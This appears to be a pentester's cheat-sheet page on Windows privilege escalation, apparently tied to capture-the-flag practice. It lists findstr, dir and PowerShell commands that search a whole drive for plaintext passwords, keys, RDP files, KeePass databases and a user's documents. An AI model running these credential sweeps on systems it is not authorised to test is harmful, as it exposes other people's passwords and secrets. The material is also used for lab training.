>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Privilege Escalation / Windows Credential Hunting in Files

Windows Credential Hunting in Files

Privilege Escalation Windows Credentials windows

findstr basic sweep

findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
findstr /spin "password" .

Search config / cred / vnc

dir /s pass == cred == vnc == .config

Powerful PowerShell recursive sweep

Get-ChildItem -Path C:\ -Recurse -Force -Include *.config,*.ini,*.xml,*.bak,*.txt,*.ps1,*.log,*.json,*.yml,*.yaml,*.env,*.cs,*.vb,*.vbs,*.key,*.pem,*.crt,*.rdp,*.kdbx -File -ErrorAction SilentlyContinue | Where-Object { $_.FullName -notmatch 'C:\\Windows' } | Select-String -Pattern "pwd=", "password=", "username=", "user=", "pass=", "ryan", "abigail", "melanie"

KeePass DB

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue

User profile docs

Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue

Wrap inside cmd

powershell.exe -c "Get-ChildItem -Path C:\\ -Recurse -Force -Include *.config,*.ini,*.xml,*.bak,*.txt,*.ps1 -File -ErrorAction SilentlyContinue | Select-String -Pattern 'pwd=', 'password='"